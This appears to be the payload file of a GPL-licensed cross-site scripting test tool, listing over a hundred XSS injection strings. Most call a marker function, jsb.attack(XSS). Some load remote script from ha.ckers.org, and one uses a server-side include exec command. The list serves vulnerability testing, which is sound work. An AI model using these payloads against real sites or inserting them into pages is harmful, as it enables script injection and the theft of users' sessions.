Copyright (C) 2015 Constantin Tschürtz

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program.  If not, see <http://www.gnu.org/licenses/>.


<SCRIPT>jsb.attack(XSS)</SCRIPT>
"/><script>jsb.attack(XSS);</script>
%3Cimg%20onerror%3Djsb.attack(XSS)%3B%20src%3Dx%3Es
'"--></style></scRipt><scRipt>jsb.attack(XSS)</scRipt>
<IMG """><SCRIPT>jsb.attack(XSS)</SCRIPT>">
'"--></style></scRipt><scRipt>jsb.attack(XSS)</scRipt>
'" onmouseover= jsb.attack(XSS)
/"onmouseover="jsb.attack(XSS)
";><BODY ONLOAD=jsb.attack(XSS)>
";><script>jsb.attack(XSS)</script>
<BASE HREF="javascript:jsb.attack(XSS);//">
<BGSOUND SRC="javascript:jsb.attack(XSS);">
<BODY BACKGROUND="javascript:jsb.attack(XSS);">
<BODY ONLOAD=jsb.attack(XSS)>
<DIV STYLE="background-image:url(javascript:jsb.attack(XSS))">
<DIV STYLE="background-image: url(&#1;javascript:jsb.attack(XSS))">
<DIV STYLE="width: expression(jsb.attack(XSS));">
<INPUT TYPE="IMAGE" SRC="javascript:jsb.attack(XSS);">
<IMG SRC="javascript:jsb.attack(XSS);">
<IMG SRC=javascript:jsb.attack(XSS)>
<IMG DYNSRC="javascript:jsb.attack(XSS);">
<BGSOUND SRC=\"javascript:jsb.attack(XSS);\">.txt
<BODY BACKGROUND=\"javascript:jsb.attack(XSS)\">.txt
<BODY ONLOAD=jsb.attack(XSS)>.txt"
<BR SIZE=\"&{jsb.attack(XSS)}\">.txt"
<DIV STYLE=\"background-image: url(&#1;javascript:jsb.attack(XSS))\">.txt
<DIV STYLE=\"background-image: url(javascript:jsb.attack(XSS))\">.txt
<DIV STYLE=\"width: expression(jsb.attack(XSS));\">.txt
<IMG DYNSRC=\"javascript:jsb.attack(XSS)\">.txt
<IMG LOWSRC=\"javascript:jsb.attack(XSS)\">.txt
IMG SRC=\" &#14;  javascript:jsb.attack(XSS);\">.txt
<IMG SRC=`javascript:jsb.attack(\"RSnake says, XSS\")`>.txt
<IMG SRC=javascript:jsb.attack(String.fromCharCode(XSS))>.txt
<IMG SRC=\"javascript:jsb.attack(XSS);\">.txt
<IMG SRC=\"javascript:jsb.attack(XSS)\".txt
<IMG SRC=javascript:jsb.attack(XSS)>.txt
<IMG SRC=javascript:jsb.attack(\"XSS\")>.txt
<IMG SRC=JaVaScRiPt:jsb.attack(XSS)>.txt
<IMG SRC=\"javtascript:jsb.attack(XSS);\">.txt
<IMG SRC=\"jav&#x09;ascript:jsb.attack(XSS);\">.txt
<IMG SRC=\"jav&#x0A;ascript:jsb.attack(XSS);\">.txt
<IMG SRC=\"jav&#x0D;ascript:jsb.attack(XSS);\">.txt
<IMG SRC=\"livescript:[code]\">.txt
<IMG SRC='vbscript:msgbox(\"XSS\")'>.txt
<INPUT TYPE=\"IMAGE\" SRC=\"javascript:jsb.attack(XSS);\">.txt
<LINK REL=\"stylesheet\" HREF=\"javascript:jsb.attack(XSS);\">.txt
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:jsb.attack(XSS);\">.txt
perl -e 'print \"<IMG SRC=java\\0script:jsb.attack(\\\"XSS\\\")>\";' > out.txt
<TABLE BACKGROUND=\"javascript:jsb.attack(XSS)\">.txt
<TABLE><TD BACKGROUND=\"javascript:jsb.attack(XSS)\">.txt
<XSS STYLE=\"behavior: url(xss.htc);\">.txt
<XSS STYLE=\"xss:expression(jsb.attack(XSS))\">.txt
<IMG SRC=\"javascript:jsb.attack(XSS);\">
<IMG SRC=javascript:jsb.attack(XSS)>
<IMG SRC=JaVaScRiPt:jsb.attack(XSS)>
<IMG SRC=javascript:jsb.attack(\"XSS\")>
<IMG SRC=`javascript:jsb.attack(\"RSnake says, XSS\")`>
<IMG \"\"\"><SCRIPT>jsb.attack(\"XSS\")</SCRIPT>\">
<IMG SRC=\"jav\tascript:jsb.attack(XSS);\">
<IMG SRC=\"jav&#x09;ascript:jsb.attack(XSS);\">
<IMG SRC=\"jav&#x0A;ascript:jsb.attack(XSS);\">
<IMG SRC=\"jav&#x0D;ascript:jsb.attack(XSS);\">
perl -e 'print \"<IMG SRC=java\\0script:jsb.attack(\\\"XSS\\\")>\";' >
<IMG SRC=\" &#14;  javascript:jsb.attack(XSS);\">
<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=jsb.attack(\"XSS\")>
<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<<SCRIPT>jsb.attack(\"XSS\");//<</SCRIPT>
<IMG SRC=\"javascript:jsb.attack(XSS)\"
\\\";jsb.attack(XSS);//
</TITLE><SCRIPT>jsb.attack(\"XSS\");</SCRIPT>
<INPUT TYPE=\"IMAGE\" SRC=\"javascript:jsb.attack(XSS);\">
<BODY BACKGROUND=\"javascript:jsb.attack(XSS)\">
<IMG DYNSRC=\"javascript:jsb.attack(XSS)\">
<IMG LOWSRC=\"javascript:jsb.attack(XSS)\">
<STYLE>li {list-style-image: url(\"javascript:jsb.attack(XSS)\");}</STYLE><UL><LI>XSS</br>
<IMG SRC='vbscript:msgbox(\"XSS\")'>
<IMG SRC=\"livescript:[code]\">
<BODY ONLOAD=jsb.attack(XSS)>
<BGSOUND SRC=\"javascript:jsb.attack(XSS);\">
<BR SIZE=\"&{jsb.attack(XSS)}\">
<LINK REL=\"stylesheet\" HREF=\"javascript:jsb.attack(XSS);\">
<STYLE>@im\\port'\\ja\\vasc\\ript:jsb.attack(\"XSS\")';</STYLE>
<IMG STYLE=\"xss:expr/*XSS*/ession(jsb.attack(XSS))\">
exp/*<A STYLE='no\\xss:noxss(\"*//*\");\nxss:ex/*XSS*//*/*/pression(jsb.attack(\"XSS\"))'>
<STYLE TYPE=\"text/javascript\">jsb.attack(XSS);</STYLE>
<STYLE>.XSS{background-image:url(\"javascript:jsb.attack(XSS)\");}</STYLE><A CLASS=XSS></A>
<STYLE type=\"text/css\">BODY{background:url(\"javascript:jsb.attack(XSS)\")}</STYLE>
<XSS STYLE=\"xss:expression(jsb.attack(XSS))\">
¼script¾jsb.attack(¢XSS¢)¼/script¾"
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:jsb.attack(XSS);\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:jsb.attack(XSS);\">
<IFRAME SRC=\"javascript:jsb.attack(XSS);\"></IFRAME>
<FRAMESET><FRAME SRC=\"javascript:jsb.attack(XSS);\"></FRAMESET>
<TABLE BACKGROUND=\"javascript:jsb.attack(XSS)\">
<TABLE><TD BACKGROUND=\"javascript:jsb.attack(XSS)\">
<DIV STYLE=\"background-image: url(javascript:jsb.attack(XSS))\">
<DIV STYLE=\"background-image: url(&#1;javascript:jsb.attack(XSS))\">
<DIV STYLE=\"width: expression(jsb.attack(XSS));\">
<!--[if gte IE 4]>\n <SCRIPT>jsb.attack(XSS);</SCRIPT>\n <![endif]-->
<BASE HREF=\"javascript:jsb.attack(XSS);//\">
a=\"get\";\nb=\"URL(\\\"\";\nc=\"javascript:\";\nd=\"jsb.attack(XSS);\\\")\";\neval(a+b+c+d);
<XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:jsb.attack(XSS)\"></B></I></XML>\n<SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>
<XML SRC=\"xsstest.xml\" ID=I></XML>\n<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<HTML><BODY>\n<?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\">\n<?import namespace=\"t\" implementation=\"#default#time2\">\n<t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>jsb.attack(\"XSS\")</SCRIPT>\">\n</BODY></HTML>
<SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>
<!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"-->
<? echo('<SCR)';\necho('IPT>jsb.attack(\"XSS\")</SCRIPT>'); ?>
<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>jsb.attack(XSS)</SCRIPT>\">
<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-jsb.attack(XSS);+ADw-/SCRIPT+AD4-
;!--\'<XSS>=&{()}\\xss<script>jsb.attack(XSS)</script>
<IMG """><SCRIPT>jsb.attack("XSS")</SCRIPT>">
<<SCRIPT>jsb.attack("XSS");//<</SCRIPT>
""<SCRIPT>a=/TSS/jsb.attack(XSS)</SCRIPT>""
\\";jsb.attack(\'XSS\');//
